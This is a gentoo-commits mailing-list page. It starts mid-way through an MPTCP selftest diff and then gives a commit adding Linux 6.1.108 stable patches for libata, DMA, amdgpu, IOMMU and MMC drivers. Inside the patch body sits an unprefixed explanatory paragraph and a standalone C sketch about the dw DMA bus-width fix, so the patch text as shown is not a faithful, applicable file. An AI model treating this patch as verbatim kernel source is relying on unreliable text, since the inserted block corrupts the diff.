+-				ip netns exec ${connector_ns} ./pm_nl_ctl rem token $tk id $id
+ 				ip netns exec ${connector_ns} ./pm_nl_ctl dsf lip $addr lport $sp \
+ 									rip $da rport $dp token $tk
+ 			fi
+@@ -1251,13 +1249,13 @@ chk_csum_nr()
+ 
+ 	printf "%-${nr_blank}s %s" " " "sum"
+ 	count=$(get_counter ${ns1} "MPTcpExtDataCsumErr")
+-	if [ "$count" != "$csum_ns1" ]; then
++	if [ -n "$count" ] && [ "$count" != "$csum_ns1" ]; then
+ 		extra_msg="$extra_msg ns1=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 0 ]; } ||
+-	   { [ "$count" -lt $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 1 ]; }; then
++	     { [ "$count" -lt $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns1"
+ 		fail_test
+ 		dump_stats=1
+@@ -1266,13 +1264,13 @@ chk_csum_nr()
+ 	fi
+ 	echo -n " - csum  "
+ 	count=$(get_counter ${ns2} "MPTcpExtDataCsumErr")
+-	if [ "$count" != "$csum_ns2" ]; then
++	if [ -n "$count" ] && [ "$count" != "$csum_ns2" ]; then
+ 		extra_msg="$extra_msg ns2=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 0 ]; } ||
+-	   { [ "$count" -lt $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 1 ]; }; then
++	     { [ "$count" -lt $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns2"
+ 		fail_test
+ 		dump_stats=1
+@@ -1314,13 +1312,13 @@ chk_fail_nr()
+ 
+ 	printf "%-${nr_blank}s %s" " " "ftx"
+ 	count=$(get_counter ${ns_tx} "MPTcpExtMPFailTx")
+-	if [ "$count" != "$fail_tx" ]; then
++	if [ -n "$count" ] && [ "$count" != "$fail_tx" ]; then
+ 		extra_msg="$extra_msg,tx=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != "$fail_tx" ] && [ $allow_tx_lost -eq 0 ]; } ||
+-	   { [ "$count" -gt "$fail_tx" ] && [ $allow_tx_lost -eq 1 ]; }; then
++	     { [ "$count" -gt "$fail_tx" ] && [ $allow_tx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] TX expected $fail_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1330,13 +1328,13 @@ chk_fail_nr()
+ 
+ 	echo -n " - failrx"
+ 	count=$(get_counter ${ns_rx} "MPTcpExtMPFailRx")
+-	if [ "$count" != "$fail_rx" ]; then
++	if [ -n "$count" ] && [ "$count" != "$fail_rx" ]; then
+ 		extra_msg="$extra_msg,rx=$count"
+ 	fi
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+ 	elif { [ "$count" != "$fail_rx" ] && [ $allow_rx_lost -eq 0 ]; } ||
+-	   { [ "$count" -gt "$fail_rx" ] && [ $allow_rx_lost -eq 1 ]; }; then
++	     { [ "$count" -gt "$fail_rx" ] && [ $allow_rx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] RX expected $fail_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -3023,6 +3021,7 @@ fullmesh_tests()
+ 		pm_nl_set_limits $ns1 1 3
+ 		pm_nl_set_limits $ns2 1 3
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
++		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,fullmesh
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 fullmesh_1 slow
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1
+@@ -3225,7 +3224,7 @@ userspace_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 userspace_1 0 slow
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+-		chk_rm_nr 1 1 invert
++		chk_rm_nr 1 0 invert
+ 	fi
+ 
+ 	# userspace pm create destroy subflow
+@@ -3235,7 +3234,76 @@ userspace_tests()
+ 		pm_nl_set_limits $ns1 0 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 userspace_1 slow
+ 		chk_join_nr 1 1 1
+-		chk_rm_nr 1 1
++		chk_rm_nr 0 1
++	fi
++
++	# remove and re-add
++	if reset "delete re-add signal" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 3
++		pm_nl_set_limits $ns2 3 3
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 42 flags signal
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		local tests_pid=$!
++
++		wait_mpj $ns2
++		chk_subflow_nr needtitle "before delete" 2
++
++		pm_nl_del_endpoint $ns1 1 10.0.2.1
++		pm_nl_del_endpoint $ns1 2 224.0.0.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete" 1
++
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add" 3
++
++		pm_nl_del_endpoint $ns1 42 10.0.1.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete ID 0" 2
++
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 99 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add" 3
++		kill_tests_wait
++
++		chk_join_nr 4 4 4
++		chk_add_nr 5 5
++		chk_rm_nr 3 2 invert
++	fi
++
++	# flush and re-add
++	if reset_with_tcp_filter "flush re-add" ns2 10.0.3.2 REJECT OUTPUT &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 1 2
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		local tests_pid=$!
++
++		wait_attempt_fail $ns2
++		chk_subflow_nr needtitle "before flush" 1
++
++		pm_nl_flush_endpoint $ns2
++		pm_nl_flush_endpoint $ns1
++		wait_rm_addr $ns2 0
++		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_mpj $ns2
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		kill_wait "${tests_pid}"
++		kill_tests_wait
++
++		chk_join_nr 2 2 2
++		chk_add_nr 2 2
++		chk_rm_nr 1 0 invert
+ 	fi
+ }
+ 
+@@ -3264,22 +3332,48 @@ endpoint_tests()
+ 		kill_tests_wait
+ 	fi
+ 
+-	if reset "delete and re-add" &&
++	if reset_with_tcp_filter "delete and re-add" ns2 10.0.3.2 REJECT OUTPUT &&
+ 	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+-		pm_nl_set_limits $ns1 1 1
+-		pm_nl_set_limits $ns2 1 1
++		pm_nl_set_limits $ns1 0 3
++		pm_nl_set_limits $ns2 0 3
++		pm_nl_add_endpoint $ns2 10.0.1.2 id 1 dev ns2eth1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_5 2>/dev/null &
+ 
+ 		wait_mpj $ns2
+ 		pm_nl_del_endpoint $ns2 2 10.0.2.2
+ 		sleep 0.5
+-		chk_subflow_nr needtitle "after delete" 1
++		chk_subflow_nr needtitle "after delete id 2" 1
+ 
+-		pm_nl_add_endpoint $ns2 10.0.2.2 dev ns2eth2 flags subflow
++		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+ 		wait_mpj $ns2
+-		chk_subflow_nr "" "after re-add" 2
++		chk_subflow_nr "" "after re-add id 2" 2
++
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_attempt_fail $ns2
++		chk_subflow_nr "" "after new reject" 2
++
++		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
++		pm_nl_del_endpoint $ns2 3 10.0.3.2
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_mpj $ns2
++		chk_subflow_nr "" "after no reject" 3
++
++		local i
++		for i in $(seq 3); do
++			pm_nl_del_endpoint $ns2 1 10.0.1.2
++			sleep 0.5
++			chk_subflow_nr "" "after delete id 0 ($i)" 2
++
++			pm_nl_add_endpoint $ns2 10.0.1.2 id 1 dev ns2eth1 flags subflow
++			wait_mpj $ns2
++			chk_subflow_nr "" "after re-add id 0 ($i)" 3
++		done
++
+ 		kill_tests_wait
++
++		chk_join_nr 6 6 6
++		chk_rm_nr 4 4
+ 	fi
+ }
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-04 13:52 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-04 13:52 UTC (permalink / raw
  To: gentoo-commits

commit:     360f49155a45c1590abbef293d9e13a2a0bf78dd
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep  4 13:52:11 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep  4 13:52:11 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=360f4915

Linux patch 6.1.108

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1107_linux-6.1.108.patch | 2490 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2494 insertions(+)

diff --git a/0000_README b/0000_README
index 31e8b007..06b1b356 100644
--- a/0000_README
+++ b/0000_README
@@ -475,6 +475,10 @@ Patch:  1106_linux-6.1.107.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.107
 
+Patch:  1107_linux-6.1.108.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.108
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1107_linux-6.1.108.patch b/1107_linux-6.1.108.patch
new file mode 100644
index 00000000..13bca249
--- /dev/null
+++ b/1107_linux-6.1.108.patch
@@ -0,0 +1,2490 @@
+diff --git a/Makefile b/Makefile
+index 4c0fc0e5e002f..4813b751ccb0d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 107
++SUBLEVEL = 108
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/loongarch/include/asm/dma-direct.h b/arch/loongarch/include/asm/dma-direct.h
+deleted file mode 100644
+index 75ccd808a2af3..0000000000000
+--- a/arch/loongarch/include/asm/dma-direct.h
++++ /dev/null
+@@ -1,11 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (C) 2020-2022 Loongson Technology Corporation Limited
+- */
+-#ifndef _LOONGARCH_DMA_DIRECT_H
+-#define _LOONGARCH_DMA_DIRECT_H
+-
+-dma_addr_t phys_to_dma(struct device *dev, phys_addr_t paddr);
+-phys_addr_t dma_to_phys(struct device *dev, dma_addr_t daddr);
+-
+-#endif /* _LOONGARCH_DMA_DIRECT_H */
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 5a13630034ef7..826d9a102a51a 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5471,6 +5471,9 @@ static void ata_host_release(struct kref *kref)
+ 	for (i = 0; i < host->n_ports; i++) {
+ 		struct ata_port *ap = host->ports[i];
+ 
++		if (!ap)
++			continue;
++
+ 		kfree(ap->pmp_link);
+ 		kfree(ap->slave_link);
+ 		kfree(ap);
+diff --git a/drivers/dma/dw/core.c b/drivers/dma/dw/core.c
+index 97ba3bfc10b13..66c98676e66ad 100644
+--- a/drivers/dma/dw/core.c
++++ b/drivers/dma/dw/core.c
+@@ -16,6 +16,7 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
++#include <linux/log2.h>
+ #include <linux/mm.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+@@ -621,12 +622,10 @@ dwc_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl,
+ 	struct dw_desc		*prev;
+ 	struct dw_desc		*first;
+ 	u32			ctllo, ctlhi;
+-	u8			m_master = dwc->dws.m_master;
+-	u8			lms = DWC_LLP_LMS(m_master);
++	u8			lms = DWC_LLP_LMS(dwc->dws.m_master);
+ 	dma_addr_t		reg;
+ 	unsigned int		reg_width;
+ 	unsigned int		mem_width;
+-	unsigned int		data_width = dw->pdata->data_width[m_master];
+ 	unsigned int		i;
+ 	struct scatterlist	*sg;
+ 	size_t			total_len = 0;
+@@ -660,7 +659,7 @@ dwc_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl,
+ 			mem = sg_dma_address(sg);
+ 			len = sg_dma_len(sg);
+ 
+-			mem_width = __ffs(data_width | mem | len);
++			mem_width = __ffs(sconfig->src_addr_width | mem | len);
+ 
+ slave_sg_todev_fill_desc:
+ 			desc = dwc_desc_get(dwc);
+@@ -720,7 +719,7 @@ dwc_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl,
+ 			lli_write(desc, sar, reg);
+ 			lli_write(desc, dar, mem);
+ 			lli_write(desc, ctlhi, ctlhi);
+-			mem_width = __ffs(data_width | mem);
++			mem_width = __ffs(sconfig->dst_addr_width | mem);
+ 			lli_write(desc, ctllo, ctllo | DWC_CTLL_DST_WIDTH(mem_width));
+ 			desc->len = dlen;
+ 
+@@ -780,17 +779,93 @@ bool dw_dma_filter(struct dma_chan *chan, void *param)
+ }
+ EXPORT_SYMBOL_GPL(dw_dma_filter);
+ 
++static int dwc_verify_p_buswidth(struct dma_chan *chan)
++{
++	struct dw_dma_chan *dwc = to_dw_dma_chan(chan);
++	struct dw_dma *dw = to_dw_dma(chan->device);
++	u32 reg_width, max_width;
++
++	if (dwc->dma_sconfig.direction == DMA_MEM_TO_DEV)
++		reg_width = dwc->dma_sconfig.dst_addr_width;
++	else if (dwc->dma_sconfig.direction == DMA_DEV_TO_MEM)
++		reg_width = dwc->dma_sconfig.src_addr_width;
++	else /* DMA_MEM_TO_MEM */
++		return 0;
++
++	max_width = dw->pdata->data_width[dwc->dws.p_master];
++
++	/* Fall-back to 1-byte transfer width if undefined */
++	if (reg_width == DMA_SLAVE_BUSWIDTH_UNDEFINED)
++		reg_width = DMA_SLAVE_BUSWIDTH_1_BYTE;
++	else if (!is_power_of_2(reg_width) || reg_width > max_width)
++		return -EINVAL;
++	else /* bus width is valid */
++		return 0;
++
++	/* Update undefined addr width value */
++	if (dwc->dma_sconfig.direction == DMA_MEM_TO_DEV)
++		dwc->dma_sconfig.dst_addr_width = reg_width;
++	else /* DMA_DEV_TO_MEM */
++		dwc->dma_sconfig.src_addr_width = reg_width;
++
++	return 0;
++}
++
++static int dwc_verify_m_buswidth(struct dma_chan *chan)
++{
++	struct dw_dma_chan *dwc = to_dw_dma_chan(chan);
++	struct dw_dma *dw = to_dw_dma(chan->device);
++	u32 reg_width, reg_burst, mem_width;
++
++	mem_width = dw->pdata->data_width[dwc->dws.m_master];
++
++	/*
++	 * It's possible to have a data portion locked in the DMA FIFO in case
++	 * of the channel suspension. Subsequent channel disabling will cause
++	 * that data silent loss. In order to prevent that maintain the src and
++	 * dst transfer widths coherency by means of the relation:
++	 * (CTLx.SRC_TR_WIDTH * CTLx.SRC_MSIZE >= CTLx.DST_TR_WIDTH)
++	 * Look for the details in the commit message that brings this change.
++	 *
++	 * Note the DMA configs utilized in the calculations below must have
++	 * been verified to have correct values by this method call.
++	 */
++	if (dwc->dma_sconfig.direction == DMA_MEM_TO_DEV) {
++		reg_width = dwc->dma_sconfig.dst_addr_width;
++		if (mem_width < reg_width)
++			return -EINVAL;
++
++		dwc->dma_sconfig.src_addr_width = mem_width;
++	} else if (dwc->dma_sconfig.direction == DMA_DEV_TO_MEM) {
++		reg_width = dwc->dma_sconfig.src_addr_width;
++		reg_burst = rounddown_pow_of_two(dwc->dma_sconfig.src_maxburst);
++
++		dwc->dma_sconfig.dst_addr_width = min(mem_width, reg_width * reg_burst);
++	}
++
++	return 0;
++}
++
+ static int dwc_config(struct dma_chan *chan, struct dma_slave_config *sconfig)
+ {
+ 	struct dw_dma_chan *dwc = to_dw_dma_chan(chan);
+ 	struct dw_dma *dw = to_dw_dma(chan->device);
++	int ret;
+ 
+ 	memcpy(&dwc->dma_sconfig, sconfig, sizeof(*sconfig));
+ 
+ 	dwc->dma_sconfig.src_maxburst =
+-		clamp(dwc->dma_sconfig.src_maxburst, 0U, dwc->max_burst);
++		clamp(dwc->dma_sconfig.src_maxburst, 1U, dwc->max_burst);
+ 	dwc->dma_sconfig.dst_maxburst =
+-		clamp(dwc->dma_sconfig.dst_maxburst, 0U, dwc->max_burst);
++		clamp(dwc->dma_sconfig.dst_maxburst, 1U, dwc->max_burst);
++
++	ret = dwc_verify_p_buswidth(chan);
++	if (ret)
++		return ret;
++
++	ret = dwc_verify_m_buswidth(chan);
++	if (ret)
++		return ret;
+ 
+ 	dw->encode_maxburst(dwc, &dwc->dma_sconfig.src_maxburst);
+ 	dw->encode_maxburst(dwc, &dwc->dma_sconfig.dst_maxburst);
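The dwc_verify_m_buswidth() hunk above enforces the documented relation CTLx.SRC_TR_WIDTH * CTLx.SRC_MSIZE >= CTLx.DST_TR_WIDTH so that a suspended-then-disabled channel cannot silently drop data locked in the FIFO. A self-contained sketch of the DEV_TO_MEM arithmetic, with invented values for mem_width, reg_width and src_maxburst:

#include <stdio.h>
#include <stdint.h>

/* Nearest power of two not above n (kernel: rounddown_pow_of_two()). */
static uint32_t rounddown_pow2(uint32_t n)
{
	while (n & (n - 1))
		n &= n - 1;
	return n;
}

int main(void)
{
	uint32_t mem_width = 4;    /* master interface data width, bytes */
	uint32_t reg_width = 1;    /* src_addr_width: 1-byte device reads */
	uint32_t src_maxburst = 8; /* items fetched per source burst */
	uint32_t reg_burst = rounddown_pow2(src_maxburst);
	uint32_t cap = reg_width * reg_burst;

	/* dst width must not exceed what one source burst supplies */
	uint32_t dst_width = mem_width < cap ? mem_width : cap;

	printf("dst_addr_width capped to %u bytes\n", dst_width); /* 4 */
	return 0;
}
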
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c
+index 02cb3a12dd762..bc030588cd220 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c
+@@ -743,7 +743,8 @@ int amdgpu_vce_ring_parse_cs(struct amdgpu_cs_parser *p,
+ 	uint32_t created = 0;
+ 	uint32_t allocated = 0;
+ 	uint32_t tmp, handle = 0;
+-	uint32_t *size = &tmp;
++	uint32_t dummy = 0xffffffff;
++	uint32_t *size = &dummy;
+ 	unsigned idx;
+ 	int i, r = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+index cd6e99cf74a06..08b10df93c317 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+@@ -28,6 +28,7 @@
+ #include <drm/drm_blend.h>
+ #include <drm/drm_gem_atomic_helper.h>
+ #include <drm/drm_plane_helper.h>
++#include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_fourcc.h>
+ 
+ #include "amdgpu.h"
+@@ -848,10 +849,14 @@ static int dm_plane_helper_prepare_fb(struct drm_plane *plane,
+ 	}
+ 
+ 	afb = to_amdgpu_framebuffer(new_state->fb);
+-	obj = new_state->fb->obj[0];
++	obj = drm_gem_fb_get_obj(new_state->fb, 0);
++	if (!obj) {
++		DRM_ERROR("Failed to get obj from framebuffer\n");
++		return -EINVAL;
++	}
++
+ 	rbo = gem_to_amdgpu_bo(obj);
+ 	adev = amdgpu_ttm_adev(rbo->tbo.bdev);
+-
+ 	r = amdgpu_bo_reserve(rbo, true);
+ 	if (r) {
+ 		dev_err(adev->dev, "fail to reserve bo (%d)\n", r);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 91f0646eb3ee0..5d193872fd1ad 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1829,8 +1829,9 @@ static int smu_bump_power_profile_mode(struct smu_context *smu,
+ }
+ 
+ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+-				   enum amd_dpm_forced_level level,
+-				   bool skip_display_settings)
++					  enum amd_dpm_forced_level level,
++					  bool skip_display_settings,
++					  bool force_update)
+ {
+ 	int ret = 0;
+ 	int index = 0;
+@@ -1859,7 +1860,7 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		}
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != level) {
++	if (force_update || smu_dpm_ctx->dpm_level != level) {
+ 		ret = smu_asic_set_performance_level(smu, level);
+ 		if (ret) {
+ 			dev_err(smu->adev->dev, "Failed to set performance level!");
+@@ -1870,13 +1871,12 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		smu_dpm_ctx->dpm_level = level;
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
+-		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+ 		workload[0] = smu->workload_setting[index];
+ 
+-		if (smu->power_profile_mode != workload[0])
++		if (force_update || smu->power_profile_mode != workload[0])
+ 			smu_bump_power_profile_mode(smu, workload, 0);
+ 	}
+ 
+@@ -1897,11 +1897,13 @@ static int smu_handle_task(struct smu_context *smu,
+ 		ret = smu_pre_display_config_changed(smu);
+ 		if (ret)
+ 			return ret;
+-		ret = smu_adjust_power_state_dynamic(smu, level, false);
++		ret = smu_adjust_power_state_dynamic(smu, level, false, false);
+ 		break;
+ 	case AMD_PP_TASK_COMPLETE_INIT:
++		ret = smu_adjust_power_state_dynamic(smu, level, true, true);
++		break;
+ 	case AMD_PP_TASK_READJUST_POWER_STATE:
+-		ret = smu_adjust_power_state_dynamic(smu, level, true);
++		ret = smu_adjust_power_state_dynamic(smu, level, true, false);
+ 		break;
+ 	default:
+ 		break;
+@@ -1948,8 +1950,7 @@ static int smu_switch_power_profile(void *handle,
+ 		workload[0] = smu->workload_setting[index];
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
+-		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
+ 		smu_bump_power_profile_mode(smu, workload, 0);
+ 
+ 	return 0;
+diff --git a/drivers/iommu/io-pgtable-arm-v7s.c b/drivers/iommu/io-pgtable-arm-v7s.c
+index ba3115fd0f86a..08ec39111e608 100644
+--- a/drivers/iommu/io-pgtable-arm-v7s.c
++++ b/drivers/iommu/io-pgtable-arm-v7s.c
+@@ -552,9 +552,8 @@ static int arm_v7s_map_pages(struct io_pgtable_ops *ops, unsigned long iova,
+ 		    paddr >= (1ULL << data->iop.cfg.oas)))
+ 		return -ERANGE;
+ 
+-	/* If no access, then nothing to do */
+ 	if (!(prot & (IOMMU_READ | IOMMU_WRITE)))
+-		return 0;
++		return -EINVAL;
+ 
+ 	while (pgcount--) {
+ 		ret = __arm_v7s_map(data, iova, paddr, pgsize, prot, 1, data->pgd,
+diff --git a/drivers/iommu/io-pgtable-arm.c b/drivers/iommu/io-pgtable-arm.c
+index 0ba817e863465..1e38a24eb71cb 100644
+--- a/drivers/iommu/io-pgtable-arm.c
++++ b/drivers/iommu/io-pgtable-arm.c
+@@ -480,9 +480,8 @@ static int arm_lpae_map_pages(struct io_pgtable_ops *ops, unsigned long iova,
+ 	if (WARN_ON(iaext || paddr >> cfg->oas))
+ 		return -ERANGE;
+ 
+-	/* If no access, then nothing to do */
+ 	if (!(iommu_prot & (IOMMU_READ | IOMMU_WRITE)))
+-		return 0;
++		return -EINVAL;
+ 
+ 	prot = arm_lpae_prot_to_pte(data, iommu_prot);
+ 	ret = __arm_lpae_map(data, iova, paddr, pgsize, pgcount, prot, lvl,
+diff --git a/drivers/iommu/io-pgtable-dart.c b/drivers/iommu/io-pgtable-dart.c
+index 74b1ef2b96bee..10811e0b773d3 100644
+--- a/drivers/iommu/io-pgtable-dart.c
++++ b/drivers/iommu/io-pgtable-dart.c
+@@ -250,9 +250,8 @@ static int dart_map_pages(struct io_pgtable_ops *ops, unsigned long iova,
+ 	if (WARN_ON(paddr >> cfg->oas))
+ 		return -ERANGE;
+ 
+-	/* If no access, then nothing to do */
+ 	if (!(iommu_prot & (IOMMU_READ | IOMMU_WRITE)))
+-		return 0;
++		return -EINVAL;
+ 
+ 	tbl = dart_get_table(data, iova);
+ 
+diff --git a/drivers/mmc/core/core.c b/drivers/mmc/core/core.c
+index df85c35a86a3b..fc2fca5325ba5 100644
+--- a/drivers/mmc/core/core.c
++++ b/drivers/mmc/core/core.c
+@@ -142,8 +142,7 @@ void mmc_request_done(struct mmc_host *host, struct mmc_request *mrq)
+ 	int err = cmd->error;
+ 
+ 	/* Flag re-tuning needed on CRC errors */
+-	if (cmd->opcode != MMC_SEND_TUNING_BLOCK &&
+-	    cmd->opcode != MMC_SEND_TUNING_BLOCK_HS200 &&
++	if (!mmc_op_tuning(cmd->opcode) &&
+ 	    !host->retune_crc_disable &&
+ 	    (err == -EILSEQ || (mrq->sbc && mrq->sbc->error == -EILSEQ) ||
+ 	    (mrq->data && mrq->data->error == -EILSEQ) ||
+diff --git a/drivers/mmc/host/dw_mmc.c b/drivers/mmc/host/dw_mmc.c
+index a0ccf88876f98..d0da4573b38cd 100644
+--- a/drivers/mmc/host/dw_mmc.c
++++ b/drivers/mmc/host/dw_mmc.c
+@@ -334,8 +334,7 @@ static u32 dw_mci_prep_stop_abort(struct dw_mci *host, struct mmc_command *cmd)
+ 	    cmdr == MMC_READ_MULTIPLE_BLOCK ||
+ 	    cmdr == MMC_WRITE_BLOCK ||
+ 	    cmdr == MMC_WRITE_MULTIPLE_BLOCK ||
+-	    cmdr == MMC_SEND_TUNING_BLOCK ||
+-	    cmdr == MMC_SEND_TUNING_BLOCK_HS200 ||
++	    mmc_op_tuning(cmdr) ||
+ 	    cmdr == MMC_GEN_CMD) {
+ 		stop->opcode = MMC_STOP_TRANSMISSION;
+ 		stop->arg = 0;
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 70e414027155d..ba18e9fa64b15 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -1206,10 +1206,8 @@ static bool msdc_cmd_done(struct msdc_host *host, int events,
+ 	}
+ 
+ 	if (!sbc_error && !(events & MSDC_INT_CMDRDY)) {
+-		if (events & MSDC_INT_CMDTMO ||
+-		    (cmd->opcode != MMC_SEND_TUNING_BLOCK &&
+-		     cmd->opcode != MMC_SEND_TUNING_BLOCK_HS200 &&
+-		     !host->hs400_tuning))
++		if ((events & MSDC_INT_CMDTMO && !host->hs400_tuning) ||
++		    (!mmc_op_tuning(cmd->opcode) && !host->hs400_tuning))
+ 			/*
+ 			 * should not clear fifo/interrupt as the tune data
+ 			 * may have alreay come when cmd19/cmd21 gets response
+@@ -1301,11 +1299,9 @@ static void msdc_start_command(struct msdc_host *host,
+ static void msdc_cmd_next(struct msdc_host *host,
+ 		struct mmc_request *mrq, struct mmc_command *cmd)
+ {
+-	if ((cmd->error &&
+-	    !(cmd->error == -EILSEQ &&
+-	      (cmd->opcode == MMC_SEND_TUNING_BLOCK ||
+-	       cmd->opcode == MMC_SEND_TUNING_BLOCK_HS200 ||
+-	       host->hs400_tuning))) ||
++	if ((cmd->error && !host->hs400_tuning &&
++	     !(cmd->error == -EILSEQ &&
++	     mmc_op_tuning(cmd->opcode))) ||
+ 	    (mrq->sbc && mrq->sbc->error))
